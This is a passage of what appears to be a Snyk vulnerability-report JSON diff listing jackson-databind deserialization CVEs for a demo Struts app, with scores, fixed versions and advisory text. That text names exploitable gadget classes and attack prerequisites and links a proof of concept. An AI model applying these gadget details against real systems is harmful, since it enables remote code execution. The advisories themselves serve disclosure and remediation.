The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/d1c67a0396e84c08d0558fbb843b5bd1f26e1921)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2688)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.94931", + "probability": "0.10105", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14060" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-j823-4qch-3rgm" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T10:29:46.691157Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:23:33Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + 
"groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-06-15T15:46:13Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.574354Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-572316", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.5)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.4", + "2.9.10.5" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2698", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": 
"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T13:55:38.989304Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:51:24.681468Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:54.565244Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It is possible to conduct a Deserialization attack using any of the following class gadget available within `weblogic/oracle-aqjms` if polymorphic type handling is enabled and an application using this package allows user input which gets deserialized. \r\n\r\n* oracle.jms.AQjmsQueueConnectionFactory\r\n* oracle.jms.AQjmsXATopicConnectionFactory\r\n* oracle.jms.AQjmsTopicConnectionFactory\r\n* oracle.jms.AQjmsXAQueueConnectionFactory\r\n* oracle.jms.AQjmsXAConnectionFactory\r\n\r\nNote: This vulnerability does not affect release `2.10.0` onward.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. 
The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.5 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2698)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n", + "epssDetails": { + "percentile": "0.91508", + "probability": "0.03404", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-14061" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-c2q3-4qrh-fm48" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-06-15T11:03:46.232208Z", + "functions_new": [ + { + "version": [ + "[,2.10.0)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-06-15T10:59:39Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": 
"2020-06-15T15:45:37Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:53:54.565244Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-6056407", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[2.9.0,2.9.9.2)", + "[2.8.0,2.8.11.4)", + "[,2.7.9.6)" + ] + }, + "exploit": "Not Defined", + "fixedIn": [ + "2.9.9.2", + "2.8.11.4", + "2.7.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2", + "title": "GitHub Comparison" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2387", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2389", + "title": "GitHub Issue" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2395", + "title": "GitHub Issue" + }, + { + "url": "https://snyk.io/blog/jackson-deserialization-vulnerability/", + "title": "Snyk Blog" + } + ], + "cvssDetails": [ + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "assigner": "Red Hat", + "severity": 
"high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:09:40.009523Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:47:46.065762Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:35.581531Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. `SubTypeValidator.java` mishandles default typing when `ehcache` is used, leading to remote code execution.\n\n\n **NOTE:** This vulnerability has also been identified as: [CVE-2019-14379](https://security.snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-455617)\n\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. 
_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. 
The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. \n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.9.9.2, 2.8.11.4, 2.7.9.6 or higher.\n## References\n- [GitHub Comparison](https://github.com/FasterXML/jackson-databind/compare/jackson-databind-2.9.9.1...jackson-databind-2.9.9.2)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2387)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2389)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2395)\n- [Snyk Blog](https://snyk.io/blog/jackson-deserialization-vulnerability/)\n", + "epssDetails": { + "percentile": "0.45827", + "probability": "0.00116", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2019-14439" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-6fpp-rgj9-8rwc", + "GHSA-gwp4-hfv6-p7hw" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2023-11-14T13:41:26.478840Z", + "functions_new": [], + "alternativeIds": [], + "disclosureTime": "2019-07-29T12:40:42Z", + "exploitDetails": { + "sources": [], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Not Defined", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": 
"com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2019-07-29T12:40:42Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:48:35.581531Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + "upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-608664", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "credit": [ + "Tatu Saloranta" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.4)", + "[2.7.0,2.9.10.6)" + ] + }, + "exploit": "Proof of Concept", + "fixedIn": [ + "2.6.7.4", + "2.9.10.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/jsontype/impl/SubTypeValidator.java", + "className": "SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2814", + "title": "GitHub Issue" + }, + { + "url": "https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062", + "title": "Medium Article" + }, + { + "url": "https://github.com/Kamimuka/cve-2020-24616-poc", + "title": "PoC" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": 
"2024-03-11T09:48:13.383929Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 8.1, + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:P/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-06T14:04:03.282990Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:48:13.383929Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:50:47.311633Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. It mishandles the interaction between serialization gadgets and typing, related to `br.com.anteros.dbcp.AnterosDBCPDataSource` (aka Anteros-DBCP).\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating object from sequence of bytes is called deserialization. Serialization is commonly used for communication (sharing objects between multiple hosts) and persistence (store the object state in a file or a database). 
It is an integral part of popular protocols like _Remote Method Invocation (RMI)_, _Java Management Extension (JMX)_, _Java Messaging System (JMS)_, _Action Message Format (AMF)_, _Java Server Faces (JSF) ViewState_, etc.\n\n_Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)), is when the application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, letting the attacker to control the state or the flow of the execution.\n\nJava deserialization issues have been known for years. However, interest in the issue intensified greatly in 2015, when classes that could be abused to achieve remote code execution were found in a [popular library (Apache Commons Collection)](https://snyk.io/vuln/SNYK-JAVA-COMMONSCOLLECTIONS-30078). These classes were used in zero-days affecting IBM WebSphere, Oracle WebLogic and many other products.\n\n \nAn attacker just needs to identify a piece of software that has both a vulnerable class on its path, and performs deserialization on untrusted data. Then all they need to do is send the payload into the deserializer, getting the command executed.\n \n\n> Developers put too much trust in Java Object Serialization. Some even de-serialize objects pre-authentication. When deserializing an Object in Java you typically cast it to an expected type, and therefore Java's strict type system will ensure you only get valid object trees. Unfortunately, by the time the type checking happens, platform code has already created and executed significant logic. So, before the final type is checked a lot of code is executed from the readObject() methods of various objects, all of which is out of the developer's control. 
By combining the readObject() methods of various classes which are available on the classpath of the vulnerable application, an attacker can execute functions (including calling Runtime.exec() to execute local OS commands).\n\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.4, 2.9.10.6 or higher.\n## References\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2814)\n- [Medium Article](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n- [PoC](https://github.com/Kamimuka/cve-2020-24616-poc)\n", + "epssDetails": { + "percentile": "0.85138", + "probability": "0.01172", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2020-24616" + ], + "CWE": [ + "CWE-502" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2020-08-26T11:28:06.617646Z", + "functions_new": [ + { + "version": [ + "[2.9.4,2.9.10.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.jsontype.impl.SubTypeValidator", + "functionName": "validateSubType" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2020-08-26T11:26:14Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Proof of Concept", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2020-08-26T14:27:29Z", + "severityBasedOn": "CVSS", + "modificationTime": "2024-03-11T09:50:47.311633Z", + "socialTrendAlert": false, + "severityWithCritical": "high", + "from": [ + "io.github.snyk:todolist-web-struts@0.0.1-SNAPSHOT", + "io.github.snyk:todolist-web-common@0.0.1-SNAPSHOT", + "com.fasterxml.jackson.core:jackson-databind@2.6.5" + ], + 
"upgradePath": [], + "isUpgradable": false, + "isPatchable": false, + "name": "com.fasterxml.jackson.core:jackson-databind", + "version": "2.6.5" + }, + { + "id": "SNYK-JAVA-COMFASTERXMLJACKSONCORE-72445", + "title": "Deserialization of Untrusted Data", + "CVSSv3": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "credit": [ + "Unknown" + ], + "semver": { + "vulnerable": [ + "[,2.6.7.3)", + "[2.7.0,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ] + }, + "exploit": "Unproven", + "fixedIn": [ + "2.6.7.3", + "2.7.9.4", + "2.8.11.2", + "2.9.6" + ], + "patches": [], + "insights": { + "triageAdvice": null + }, + "language": "java", + "severity": "high", + "cvssScore": 8.1, + "functions": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "filePath": "com/fasterxml/jackson/databind/ObjectMapper.java", + "className": "ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "malicious": false, + "isDisputed": false, + "moduleName": "com.fasterxml.jackson.core:jackson-databind", + "references": [ + { + "url": "https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1", + "title": "GitHub Commit" + }, + { + "url": "https://github.com/FasterXML/jackson-databind/issues/2052", + "title": "GitHub Issue" + } + ], + "cvssDetails": [ + { + "assigner": "Red Hat", + "severity": "high", + "cvssV3Vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "cvssV3BaseScore": 7.3, + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "assigner": "NVD", + "severity": "high", + "cvssV3Vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "cvssV3BaseScore": 7.5, + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "cvssSources": [ + { + "type": "primary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H/E:U/RL:U/RC:C", + "assigner": "Snyk", + "severity": "high", + "baseScore": 8.1, + "cvssVersion": "3.1", + "modificationTime": 
"2024-03-06T13:58:45.496040Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", + "assigner": "Red Hat", + "severity": "high", + "baseScore": 7.3, + "cvssVersion": "3.0", + "modificationTime": "2024-03-11T09:48:41.204259Z" + }, + { + "type": "secondary", + "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", + "assigner": "NVD", + "severity": "high", + "baseScore": 7.5, + "cvssVersion": "3.1", + "modificationTime": "2024-03-11T09:53:36.643590Z" + } + ], + "description": "## Overview\n[com.fasterxml.jackson.core:jackson-databind](https://github.com/FasterXML/jackson-databind) is a library which contains the general-purpose data-binding functionality and tree-model for Jackson Data Processor.\n\nAffected versions of this package are vulnerable to Deserialization of Untrusted Data. An attacker could perform a Remote Code Execution attack, if the user is handling untrusted content or using the `Default Typing` feature. an incomplete fix for the [CVE-2017-7525](https://snyk.io/vuln/SNYK-JAVA-COMFASTERXMLJACKSONCORE-31507) deserialization flaw.\r\n\r\n**Note:** This vulnerability (`CVE-2018-12022`) is not identical to `CVE-2018-12018`,`CVE-2018-12019`, `CVE-2018-14720`, `CVE-2018-14721`, `CVE-2018-14723` and `CVE-2018-11307`.\n\n## Details\n\nSerialization is a process of converting an object into a sequence of bytes which can be persisted to a disk or database or can be sent through streams. The reverse process of creating objects from a sequence of bytes is called deserialization. _Deserialization of untrusted data_ ([CWE-502](https://cwe.mitre.org/data/definitions/502.html)) occurs when an application deserializes untrusted data without sufficiently verifying that the resulting data will be valid, allowing the attacker to control the state or the flow of the execution.\n\n`com.fasterxml.jackson.core:jackson-databind` allows deserialization of JSON input to Java objects. 
If an application using this dependency has the ability to deserialize a JSON string from an untrusted source, an attacker could leverage this vulnerability to conduct deserialization attacks.\n\nExploitation of unsafe deserialization attacks through `jackson-databind` requires the following prerequisites: \n\n### 1. The target application allowing JSON user input which is processed by jackson-databind\n\nAn application using `jackson-databind` is only vulnerable if a user-provided JSON data is deserialized. \n\n### 2. Polymorphic type handling for properties with nominal type are enabled\n\nPolymorphic type handling refers to the addition of enough type information so that the deserializer can instantiate the appropriate subtype of a value. Use of \"default typing\" is considered dangerous due to the possibility of an untrusted method (gadget) managing to specify a class that is accessible through the class-loader and therefore, exposing a set of methods and/or fields.\n\n### 3. An exploitable gadget class is available for the attacker to leverage \n\nGadget chains are specially crafted method sequences that can be created by an attacker in order to change the flow of code execution. These gadgets are often methods introduced by third-party components which an attacker could utilise in order to attack the target application. Not every gadget out there is supported by `jackson-databind`. The maintainers of `jackson-databind` proactively blacklists possible serialization gadgets in an attempt to ensure that it is not possible for an attacker to chain gadgets during serialization. 
\n\n### Further reading:\n\n - [On Jackson CVEs: Don’t Panic on Medium](https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062)\n - [NCC Group Jackson Deserialization WhitePaper](https://www.nccgroup.com/globalassets/our-research/us/whitepapers/2018/jackson_deserialization.pdf)\n - [Java Security Best Practices](https://snyk.io/blog/10-java-security-best-practices/)\n \n## Remediation\nUpgrade `com.fasterxml.jackson.core:jackson-databind` to version 2.6.7.3, 2.7.9.4, 2.8.11.2, 2.9.6 or higher.\n## References\n- [GitHub Commit](https://github.com/FasterXML/jackson-databind/commit/7487cf7eb14be2f65a1eb108e8629c07ef45e0a1)\n- [GitHub Issue](https://github.com/FasterXML/jackson-databind/issues/2052)\n", + "epssDetails": { + "percentile": "0.81303", + "probability": "0.00770", + "modelVersion": "v2023.03.01" + }, + "identifiers": { + "CVE": [ + "CVE-2018-12022" + ], + "CWE": [ + "CWE-502" + ], + "GHSA": [ + "GHSA-cjjf-94ff-43w7", + "GHSA-wrr7-33fx-rcvj" + ] + }, + "packageName": "com.fasterxml.jackson.core:jackson-databind", + "proprietary": false, + "creationTime": "2018-10-11T17:11:34.234921Z", + "functions_new": [ + { + "version": [ + "[,2.7.9.4)", + "[2.8.0,2.8.11.2)", + "[2.9.0,2.9.6)" + ], + "functionId": { + "className": "com.fasterxml.jackson.databind.ObjectMapper", + "functionName": "enableDefaultTyping" + } + } + ], + "alternativeIds": [], + "disclosureTime": "2018-05-29T17:00:04Z", + "exploitDetails": { + "sources": [ + "Snyk" + ], + "maturityLevels": [ + { + "type": "secondary", + "level": "Not Defined", + "format": "CVSSv3" + }, + { + "type": "primary", + "level": "Proof of Concept", + "format": "CVSSv4" + } + ] + }, + "packageManager": "maven", + "mavenModuleName": { + "groupId": "com.fasterxml.jackson.core", + "artifactId": "jackson-databind" + }, + "publicationTime": "2018-10-11T17:00:03Z", + "severityBasedOn": "CVSS", 